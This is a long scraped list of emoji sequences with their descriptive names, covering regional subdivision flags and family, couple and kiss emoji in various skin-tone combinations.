🏴 Flag for Schaan (LI-07)
👨🏿👩🏿👶🏿👧🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Muharraq (BH-15)
🏴 Flag for Southern (BH-14)
🧕🏾♀️ Woman With Headscarf: Medium-Dark Skin Tone
🏴 Flag for Sibiu (RO-SB)
🧕🏼♀️ Woman With Headscarf: Medium-Light Skin Tone
👩🏻❤️👨🏿 Couple With Heart - Woman: Light Skin Tone, Man: Dark Skin Tone
🏴 Flag for Northern (BH-17)
🏴 Flag for Bubanza (BI-BB)
👩🏻❤️👩 Couple With Heart - Woman: Light Skin Tone, Woman
🏴 Flag for Flanders (BE-VLG)
👩🏽👧🏽 Family - Woman: Medium Skin Tone, Girl: Medium Skin Tone
👨🏻👩🏻👶🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Bujumbura (BI-BM)
🧕🏿♀️ Woman With Headscarf: Dark Skin Tone
🏴 Flag for Bujumbura Rural (BI-BL)
👨🏾❤️💋👩🏽 Kiss - Man: Medium-Dark Skin Tone, Woman: Medium Skin Tone
👨🏼👩🏼👶🏼👶🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👨🏻👨🏻👦🏻👶🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Cankuzo (BI-CA)
🏴 Flag for Montana (BG-12)
🏴 Flag for Sala (LV-085)
⃣ Combining Enclosing Keycap
🏴 Flag for Bururi (BI-BR)
🏴 Flag for Kardzhali (BG-09)
🏴 Flag for Rumonge (BI-RM)
🏴 Flag for Aruba (NL-AW)
🏴 Flag for Muyinga (BI-MY)
🏴 Flag for Rutana (BI-RT)
🏴 Flag for Ruyigi (BI-RY)
🏴 Flag for Kirundo (BI-KI)
🏴 Flag for Kayanza (BI-KY)
🏴 Flag for Mwaro (BI-MW)
🏴 Flag for Shumen (BG-27)
🏴 Flag for Ngozi (BI-NG)
🏴 Flag for Karuzi (BI-KR)
🏴 Flag for Muramvya (BI-MU)
🏴 Flag for Laâyoune-Boujdour-Sakia El Hamra (MA-15)
👨🏽👩🏽👶🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👨🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏾👩🏾👶🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Donga (BJ-DO)
👩🏽👨🏽👶🏽👦🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
👨🏽❤️💋👩🏼 Kiss - Man: Medium Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Hauts-de-France (FR-HDF)
🏴 Flag for Alibori (BJ-AL)
🏴 Flag for Atakora (BJ-AK)
👨🏿👩🏿👶🏿👶🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Littoral (BJ-LI)
🏴 Flag for Borgou (BJ-BO)
👩👩👧👶 Family: Woman, Woman, Girl, Baby
🏴 Flag for North Dakota (US-ND)
👨🏼❤️💋👨🏾 Kiss - Man: Medium-Light Skin Tone, Man: Medium-Dark Skin Tone
🏴 Flag for Kouffo (BJ-KO)
🏴 Flag for Plateau (BJ-PL)
🏴 Flag for Carriacou and Petite Martinique (GD-10)
🏴 Flag for Zou (BJ-ZO)
👩🏼❤️👨🏻 Couple With Heart - Woman: Medium-Light Skin Tone, Man: Light Skin Tone
👩🏽❤️👨🏽 Couple With Heart - Woman: Medium Skin Tone, Man: Medium Skin Tone
👨🏽❤️👩🏼 Couple With Heart - Man: Medium Skin Tone, Woman: Medium-Light Skin Tone
👩🏽❤️👨🏻 Couple With Heart - Woman: Medium Skin Tone, Man: Light Skin Tone
🏴 Flag for Beqaa (LB-BI)
🏴 Flag for Temburong (BN-TE)
👩🏻👦🏻 Family - Woman: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Tutong (BN-TU)
🏴 Flag for Brunei-Muara (BN-BM)
👨🏻👩🏻👦🏻👦🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Vratsa (BG-06)
👩🏽❤️👨🏼 Couple With Heart - Woman: Medium Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Beni (BO-B)
🏴 Flag for Belait (BN-BE)
👩🏼❤️👨 Couple With Heart - Woman: Medium-Light Skin Tone, Man
🏴 Flag for Ouémé (BJ-OU)
👩🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Roche Caiman (SC-25)
👩🏻❤️👨🏾 Couple With Heart - Woman: Light Skin Tone, Man: Medium-Dark Skin Tone
🏴 Flag for Cochabamba (BO-C)
👨🏾👩🏾👧🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Pando (BO-N)
👩🏽❤️👩🏻 Couple With Heart - Woman: Medium Skin Tone, Woman: Light Skin Tone
👩🏾❤️👨🏽 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Medium Skin Tone
🏴 Flag for Chuquisaca (BO-H)
🏴 Flag for La Paz (BO-L)
🏴 Flag for Khentii (MN-039)
🕴🏽♀️ Woman in Business Suit Levitating: Medium Skin Tone
🏴 Flag for Dolneni (MK-27)
🏴 Flag for Stara Zagora (BG-24)
👩🏽👦🏽 Family - Woman: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Sistan and Baluchestan (IR-13)
👩🏾❤️👨🏼 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Potosí (BO-P)
🏴 Flag for Bonaire (BQ-BO)
👩❤️💋👨🏻 Kiss - Woman, Man: Light Skin Tone
👩🏾❤️👨 Couple With Heart - Woman: Medium-Dark Skin Tone, Man
👩🏼👦🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Brčko District (BA-BRC)
🏴 Flag for Saba (BQ-SA)
👩🏽❤️👨🏾 Couple With Heart - Woman: Medium Skin Tone, Man: Medium-Dark Skin Tone
👩🏾❤️👨🏿 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Dark Skin Tone
🏴 Flag for Acre (BR-AC)
🏴 Flag for Gitega (BI-GI)
👩🏿👦🏿 Family - Woman: Dark Skin Tone, Boy: Dark Skin Tone
👩🏿❤️👨🏻 Couple With Heart - Woman: Dark Skin Tone, Man: Light Skin Tone
🏴 Flag for Amazonas (BR-AM)
🏴 Flag for Buenos Aires (AR-C)
👨🏼👩🏼👧🏼👶🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👨🏼❤️💋👨🏼 Kiss - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Espírito Santo (BR-ES)
👨🏿❤️💋👨🏾 Kiss - Man: Dark Skin Tone, Man: Medium-Dark Skin Tone
👨🏼❤️💋👨🏽 Kiss - Man: Medium-Light Skin Tone, Man: Medium Skin Tone
👩🏾👦🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👨🏻❤️👩 Couple With Heart - Man: Light Skin Tone, Woman
👨🏿❤️💋👩🏾 Kiss - Man: Dark Skin Tone, Woman: Medium-Dark Skin Tone
👩🏻❤️💋👩🏽 Kiss - Woman: Light Skin Tone, Woman: Medium Skin Tone
👨🏼❤️💋👨🏿 Kiss - Man: Medium-Light Skin Tone, Man: Dark Skin Tone
👩🏽👦🏽👦🏽 Family - Woman: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
👩🏿❤️👩🏼 Couple With Heart - Woman: Dark Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Maranhão (BR-MA)
👩🏿❤️👩🏽 Couple With Heart - Woman: Dark Skin Tone, Woman: Medium Skin Tone
👩🏿❤️👩 Couple With Heart - Woman: Dark Skin Tone, Woman
🏴 Flag for Amapá (BR-AP)
👨🏽❤️👨🏻 Couple With Heart - Man: Medium Skin Tone, Man: Light Skin Tone
👩🏻❤️💋👨🏻 Kiss - Woman: Light Skin Tone, Man: Light Skin Tone
👨🏽❤️💋👨🏽 Kiss - Man: Medium Skin Tone, Man: Medium Skin Tone
👩🏿❤️💋👩🏻 Kiss - Woman: Dark Skin Tone, Woman: Light Skin Tone
👨🏽❤️💋👩🏿 Kiss - Man: Medium Skin Tone, Woman: Dark Skin Tone
👩🏼❤️💋👨🏾 Kiss - Woman: Medium-Light Skin Tone, Man: Medium-Dark Skin Tone
👨🏿❤️💋👨🏼 Kiss - Man: Dark Skin Tone, Man: Medium-Light Skin Tone
👨🏾❤️💋👨🏿 Kiss - Man: Medium-Dark Skin Tone, Man: Dark Skin Tone
👩🏽❤️💋👩🏿 Kiss - Woman: Medium Skin Tone, Woman: Dark Skin Tone
👩🏼❤️💋👨🏿 Kiss - Woman: Medium-Light Skin Tone, Man: Dark Skin Tone
👨🏽❤️💋👩🏽 Kiss - Man: Medium Skin Tone, Woman: Medium Skin Tone
👨🏾❤️💋👨🏼 Kiss - Man: Medium-Dark Skin Tone, Man: Medium-Light Skin Tone
👨🏽❤️💋👩🏻 Kiss - Man: Medium Skin Tone, Woman: Light Skin Tone
👨🏾❤️💋👨 Kiss - Man: Medium-Dark Skin Tone, Man
👨🏾❤️💋👨🏾 Kiss - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone
👩❤️💋👨🏾 Kiss - Woman, Man: Medium-Dark Skin Tone
👩❤️💋👩🏻 Kiss - Woman, Woman: Light Skin Tone
👩🏽❤️💋👨🏻 Kiss - Woman: Medium Skin Tone, Man: Light Skin Tone
👩🏿❤️💋👨🏿 Kiss - Woman: Dark Skin Tone, Man: Dark Skin Tone
👩🏻❤️💋👩🏿 Kiss - Woman: Light Skin Tone, Woman: Dark Skin Tone
👩🏻❤️💋👩🏼 Kiss - Woman: Light Skin Tone, Woman: Medium-Light Skin Tone
👩🏾❤️💋👩🏿 Kiss - Woman: Medium-Dark Skin Tone, Woman: Dark Skin Tone
👩🏾❤️💋👩 Kiss - Woman: Medium-Dark Skin Tone, Woman
👩🏾❤️💋👩🏻 Kiss - Woman: Medium-Dark Skin Tone, Woman: Light Skin Tone
👩🏻❤️👨 Couple With Heart - Woman: Light Skin Tone, Man
👩🏻👩🏻👦🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone
👩🏾❤️💋👨🏾 Kiss - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone
👨🏻❤️👨🏽 Couple With Heart - Man: Light Skin Tone, Man: Medium Skin Tone
🏴 Flag for Mato Grosso (BR-MT)
👨🏽❤️👩🏻 Couple With Heart - Man: Medium Skin Tone, Woman: Light Skin Tone
👨❤️👨🏿 Couple With Heart - Man, Man: Dark Skin Tone
👩🏿❤️💋👨🏼 Kiss - Woman: Dark Skin Tone, Man: Medium-Light Skin Tone
👩🏿❤️💋👩🏾 Kiss - Woman: Dark Skin Tone, Woman: Medium-Dark Skin Tone
👩🏻👦🏻👧🏻 Family - Woman: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Santa Cruz (BO-S)
👨🏻❤️👩🏽 Couple With Heart - Man: Light Skin Tone, Woman: Medium Skin Tone
👨🏽❤️👩🏽 Couple With Heart - Man: Medium Skin Tone, Woman: Medium Skin Tone
👩🏾❤️💋👩🏽 Kiss - Woman: Medium-Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Collines (BJ-CO)
👨🏻👩🏻👦🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone
👨❤️👨🏽 Couple With Heart - Man, Man: Medium Skin Tone
👨🏾👩🏾👦🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏼❤️👨 Couple With Heart - Man: Medium-Light Skin Tone, Man
👨🏾❤️👩🏽 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Pará (BR-PA)
👩🏽👦🏽👧🏽 Family - Woman: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
👨🏼❤️👨🏼 Couple With Heart - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone
👨🏿❤️👨🏻 Couple With Heart - Man: Dark Skin Tone, Man: Light Skin Tone
👩🏽❤️👩🏽 Couple With Heart - Woman: Medium Skin Tone, Woman: Medium Skin Tone
👨🏾❤️👨🏽 Couple With Heart - Man: Medium-Dark Skin Tone, Man: Medium Skin Tone
👨🏽❤️👨🏽 Couple With Heart - Man: Medium Skin Tone, Man: Medium Skin Tone
👨🏻❤️👩🏼 Couple With Heart - Man: Light Skin Tone, Woman: Medium-Light Skin Tone
👨🏾❤️👩🏿 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Dark Skin Tone
👨🏾❤️👨🏼 Couple With Heart - Man: Medium-Dark Skin Tone, Man: Medium-Light Skin Tone
👩🏾❤️💋👩🏾 Kiss - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone
👩🏼❤️👩🏻 Couple With Heart - Woman: Medium-Light Skin Tone, Woman: Light Skin Tone
👨🏿❤️👩🏼 Couple With Heart - Man: Dark Skin Tone, Woman: Medium-Light Skin Tone
👨🏼❤️👨🏾 Couple With Heart - Man: Medium-Light Skin Tone, Man: Medium-Dark Skin Tone
👨🏽❤️👨🏾 Couple With Heart - Man: Medium Skin Tone, Man: Medium-Dark Skin Tone
👩❤️👨🏾 Couple With Heart - Woman, Man: Medium-Dark Skin Tone
🏴 Flag for Alagoas (BR-AL)
👩❤️👨🏻 Couple With Heart - Woman, Man: Light Skin Tone
🏴 Flag for Hauts-Bassins (BF-09)
👨🏼👦🏼 Family - Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏾❤️👩🏾 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Rio de Janeiro (BR-RJ)
👨🏾❤️💋👩🏻 Kiss - Man: Medium-Dark Skin Tone, Woman: Light Skin Tone
🏴 Flag for Rondônia (BR-RO)
👨🏾❤️👨🏿 Couple With Heart - Man: Medium-Dark Skin Tone, Man: Dark Skin Tone
👨🏽👦🏽 Family - Man: Medium Skin Tone, Boy: Medium Skin Tone
👨🏼❤️👨🏽 Couple With Heart - Man: Medium-Light Skin Tone, Man: Medium Skin Tone
🏴 Flag for Piauí (BR-PI)
👨🏽👩🏽👦🏽👦🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Rio Grande do Norte (BR-RN)
👩🏻❤️👨🏻 Couple With Heart - Woman: Light Skin Tone, Man: Light Skin Tone
👨🏻👦🏻 Family - Man: Light Skin Tone, Boy: Light Skin Tone
👩🏼❤️👩🏾 Couple With Heart - Woman: Medium-Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏿❤️👩🏾 Couple With Heart - Man: Dark Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Sergipe (BR-SE)
🏴 Flag for Paraná (BR-PR)
👨🏿👦🏿 Family - Man: Dark Skin Tone, Boy: Dark Skin Tone
👩🏼❤️👩🏽 Couple With Heart - Woman: Medium-Light Skin Tone, Woman: Medium Skin Tone
👩🏾❤️👩🏼 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Moscow Province (RU-MOS)
👩🏽❤️💋👩🏽 Kiss - Woman: Medium Skin Tone, Woman: Medium Skin Tone
👩🏿👦🏿👦🏿 Family - Woman: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for São Paulo (BR-SP)
🏴 Flag for East Azerbaijan (IR-01)
🏴 Flag for Rio Grande do Sul (BR-RS)
👩🏼❤️👨🏿 Couple With Heart - Woman: Medium-Light Skin Tone, Man: Dark Skin Tone
🏴 Flag for Sogn og Fjordane (NO-14)
🏴 Flag for Tocantins (BR-TO)
🏴 Flag for Sveti Andraž v Slovenskih Goricah (SI-182)
👨🏼❤️👩🏻 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Light Skin Tone
👨🏿❤️👨🏽 Couple With Heart - Man: Dark Skin Tone, Man: Medium Skin Tone
👨🏽👦🏽👦🏽 Family - Man: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
👨🏿👦🏿👦🏿 Family - Man: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Bimini (BS-BI)
👨🏿❤️👩 Couple With Heart - Man: Dark Skin Tone, Woman
👩🏻👦🏻👦🏻 Family - Woman: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Roraima (BR-RR)
🏴 Flag for Oruro (BO-O)
🏴 Flag for Exuma (BS-EX)
👨🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏽❤️👨 Couple With Heart - Woman: Medium Skin Tone, Man
🏴 Flag for Central Eleuthera (BS-CE)
🏴 Flag for Berry Islands (BS-BY)
🏴 Flag for Makamba (BI-MA)
🏴 Flag for Federal District (BR-DF)
👩🏻❤️👩🏾 Couple With Heart - Woman: Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏼❤️💋👩🏼 Kiss - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Central Abaco (BS-CO)
🏴 Flag for East Grand Bahama (BS-EG)
🏴 Flag for Central Andros (BS-CS)
👨🏻👦🏻👧🏻 Family - Man: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Crooked Island (BS-CK)
🏴 Flag for Black Point (BS-BP)
👨🏼👦🏼👧🏼 Family - Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏽👦🏽👧🏽 Family - Man: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
👩🏿❤️👨🏾 Couple With Heart - Woman: Dark Skin Tone, Man: Medium-Dark Skin Tone
👩🏾❤️💋👨🏼 Kiss - Woman: Medium-Dark Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for North Eleuthera (BS-NE)
🏴 Flag for North Abaco (BS-NO)
🏴 Flag for Mayaguana (BS-MG)
👨🏾👦🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏼❤️💋👩🏻 Kiss - Man: Medium-Light Skin Tone, Woman: Light Skin Tone
🏴 Flag for Grand Cay (BS-GC)
🏴 Flag for Freeport (BS-FP)
🏴 Flag for Inagua (BS-IN)
🏴 Flag for Hope Town (BS-HT)
👩🏾❤️👩🏿 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Long Island (BS-LI)
👨🏿👦🏿👧🏿 Family - Man: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
👨🏾❤️👩 Couple With Heart - Man: Medium-Dark Skin Tone, Woman
👩🏿❤️👨🏿 Couple With Heart - Woman: Dark Skin Tone, Man: Dark Skin Tone
👨🏻👦🏻👶🏻 Family - Man: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
👨👨👶 Family: Man, Man, Baby
👩👧👶 Family: Woman, Girl, Baby
👨👦👶 Family: Man, Boy, Baby
👨👨👶👦 Family: Man, Man, Baby, Boy
👨👦👧 Family: Man, Boy, Girl
👨👶👶 Family: Man, Baby, Baby
🏴 Flag for Ragged Island (BS-RI)
👩🏿❤️👩🏿 Couple With Heart - Woman: Dark Skin Tone, Woman: Dark Skin Tone
👩🏿❤️👨🏽 Couple With Heart - Woman: Dark Skin Tone, Man: Medium Skin Tone
👩🏼❤️👨🏼 Couple With Heart - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for North Andros (BS-NS)
👩🏿❤️👩🏻 Couple With Heart - Woman: Dark Skin Tone, Woman: Light Skin Tone
👨🏻❤️💋👨 Kiss - Man: Light Skin Tone, Man
🏴 Flag for South Andros (BS-SA)
👨🏻❤️💋👨🏼 Kiss - Man: Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for South Eleuthera (BS-SE)
👨🏼👦🏼👶🏼 Family - Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👨🏻❤️💋👩🏻 Kiss - Man: Light Skin Tone, Woman: Light Skin Tone
👨🏼❤️💋👩🏾 Kiss - Man: Medium-Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏾❤️💋👩🏼 Kiss - Man: Medium-Dark Skin Tone, Woman: Medium-Light Skin Tone
👨🏾❤️💋👨🏻 Kiss - Man: Medium-Dark Skin Tone, Man: Light Skin Tone
🏴 Flag for Santa Catarina (BR-SC)
👩👩👦👧 Family: Woman, Woman, Boy, Girl
👨❤️💋👩🏾 Kiss - Man, Woman: Medium-Dark Skin Tone
🏴 Flag for Rum Cay (BS-RC)
👩👩👶👦 Family: Woman, Woman, Baby, Boy
👨🏻❤️💋👩🏽 Kiss - Man: Light Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Cat Island (BS-CI)
👩🏽❤️👩 Couple With Heart - Woman: Medium Skin Tone, Woman
👨🏽👦🏽👶🏽 Family - Man: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
👩👨👦👶 Family: Woman, Man, Boy, Baby
👨🏾❤️💋👩 Kiss - Man: Medium-Dark Skin Tone, Woman
👨❤️💋👨🏻 Kiss - Man, Man: Light Skin Tone
👨🏻❤️💋👨🏿 Kiss - Man: Light Skin Tone, Man: Dark Skin Tone
👨🏼❤️💋👩🏽 Kiss - Man: Medium-Light Skin Tone, Woman: Medium Skin Tone
👨🏾👦🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for South Abaco (BS-SO)
👩🏾❤️💋👩🏼 Kiss - Woman: Medium-Dark Skin Tone, Woman: Medium-Light Skin Tone
👨🏻❤️👨🏿 Couple With Heart - Man: Light Skin Tone, Man: Dark Skin Tone
👨🏿❤️💋👨🏿 Kiss - Man: Dark Skin Tone, Man: Dark Skin Tone
👩🏾❤️💋👨🏿 Kiss - Woman: Medium-Dark Skin Tone, Man: Dark Skin Tone
👩🏼❤️💋👨🏽 Kiss - Woman: Medium-Light Skin Tone, Man: Medium Skin Tone
👩🏾❤️💋👨🏻 Kiss - Woman: Medium-Dark Skin Tone, Man: Light Skin Tone
👩🏽❤️💋👨 Kiss - Woman: Medium Skin Tone, Man
👨👧👶 Family: Man, Girl, Baby
👩🏻❤️💋👨🏾 Kiss - Woman: Light Skin Tone, Man: Medium-Dark Skin Tone
👨❤️👨🏼 Couple With Heart - Man, Man: Medium-Light Skin Tone
👩🏼❤️💋👩🏼 Kiss - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone
👨🏿❤️💋👩🏿 Kiss - Man: Dark Skin Tone, Woman: Dark Skin Tone
👨❤️💋👩🏼 Kiss - Man, Woman: Medium-Light Skin Tone
🏴 Flag for Abidjan (CI-AB)
👩🏻❤️💋👨 Kiss - Woman: Light Skin Tone, Man
👩🏼❤️💋👩🏾 Kiss - Woman: Medium-Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏻❤️💋👩🏼 Kiss - Man: Light Skin Tone, Woman: Medium-Light Skin Tone
👩🏽❤️💋👨🏿 Kiss - Woman: Medium Skin Tone, Man: Dark Skin Tone
👩🏿❤️💋👩🏼 Kiss - Woman: Dark Skin Tone, Woman: Medium-Light Skin Tone
👩🏿❤️💋👨🏾 Kiss - Woman: Dark Skin Tone, Man: Medium-Dark Skin Tone
👩🏼❤️💋👨 Kiss - Woman: Medium-Light Skin Tone, Man
👩❤️👩🏾 Couple With Heart - Woman, Woman: Medium-Dark Skin Tone
👨🏿❤️👨🏼 Couple With Heart - Man: Dark Skin Tone, Man: Medium-Light Skin Tone
👨🏿👦🏿👶🏿 Family - Man: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
👨🏼❤️👩🏼 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone
👩🏼❤️👨🏽 Couple With Heart - Woman: Medium-Light Skin Tone, Man: Medium Skin Tone
🏴 Flag for Spanish Wells (BS-SW)
👨🏿❤️👨🏿 Couple With Heart - Man: Dark Skin Tone, Man: Dark Skin Tone
👨🏼❤️👨🏿 Couple With Heart - Man: Medium-Light Skin Tone, Man: Dark Skin Tone
👨🏼❤️👩 Couple With Heart - Man: Medium-Light Skin Tone, Woman
👩🏼❤️👩🏼 Couple With Heart - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone
👨🏼❤️👨🏻 Couple With Heart - Man: Medium-Light Skin Tone, Man: Light Skin Tone
👨🏾❤️👨🏾 Couple With Heart - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone
👩❤️👩🏼 Couple With Heart - Woman, Woman: Medium-Light Skin Tone
👨🏼❤️👩🏿 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Dark Skin Tone
👨🏻❤️👨🏾 Couple With Heart - Man: Light Skin Tone, Man: Medium-Dark Skin Tone
👨🏽❤️👩🏾 Couple With Heart - Man: Medium Skin Tone, Woman: Medium-Dark Skin Tone
👩❤️👩🏿 Couple With Heart - Woman, Woman: Dark Skin Tone
👨🏽❤️👨🏿 Couple With Heart - Man: Medium Skin Tone, Man: Dark Skin Tone
👨👨👦👶 Family: Man, Man, Boy, Baby
👨🏿❤️👨 Couple With Heart - Man: Dark Skin Tone, Man
👩🏻❤️👩🏿 Couple With Heart - Woman: Light Skin Tone, Woman: Dark Skin Tone
🏴 Flag for San Salvador (BS-SS)
🏴 Flag for Samtse (BT-14)
👩🏻❤️👨🏽 Couple With Heart - Woman: Light Skin Tone, Man: Medium Skin Tone
👩🏼❤️👩🏿 Couple With Heart - Woman: Medium-Light Skin Tone, Woman: Dark Skin Tone
👨❤️👩🏿 Couple With Heart - Man, Woman: Dark Skin Tone
🏴 Flag for Paro (BT-11)
👨🏻❤️👩🏾 Couple With Heart - Man: Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏼👧🏼 Family - Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Thimphu (BT-15)
👩🏾❤️👩🏽 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for West Grand Bahama (BS-WG)
🏴 Flag for Haa (BT-13)
🏴 Flag for Chukha (BT-12)
👨🏻❤️💋👨🏽 Kiss - Man: Light Skin Tone, Man: Medium Skin Tone
👨🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏽👧🏽 Family - Man: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Acklins (BS-AK)
🏴 Flag for Trongsa (BT-32)
🏴 Flag for Trashigang (BT-41)
🏴 Flag for Punakha (BT-23)
🏴 Flag for Wangdue Phodrang (BT-24)
🏴 Flag for Bumthang (BT-33)
🏴 Flag for Zhemgang (BT-34)
👩🏼❤️💋👨🏼 Kiss - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Mongar (BT-42)
🏴 Flag for Paraíba (BR-PB)
👩🏿❤️👨🏼 Couple With Heart - Woman: Dark Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Zürich (CH-ZH)
🏴 Flag for Sarpang (BT-31)
🏴 Flag for Dagana (BT-22)
👩🏻❤️💋👨🏽 Kiss - Woman: Light Skin Tone, Man: Medium Skin Tone
👨🏿👨🏿👧🏿👧🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Central (BW-CE)
🏴 Flag for Gasa (BT-GA)
🏴 Flag for Chobe (BW-CH)
🏴 Flag for Samdrup Jongkhar (BT-45)
🏴 Flag for Francistown (BW-FR)
🏴 Flag for Lhuntse (BT-44)
🏴 Flag for Trashiyangtse (BT-TY)
🏴 Flag for Tsirang (BT-21)
🏴 Flag for Pemagatshel (BT-43)
👨🏿👧🏿 Family - Man: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for North East (BW-NE)
🏴 Flag for Kgatleng (BW-KL)
🏴 Flag for Kgalagadi (BW-KG)
🏴 Flag for South East (BW-SE)
🏴 Flag for Kweneng (BW-KW)
👨🏻👧🏻👦🏻 Family - Man: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for North West (BW-NW)
🏴 Flag for Jwaneng (BW-JW)
🏴 Flag for Mangrove Cay (BS-MC)
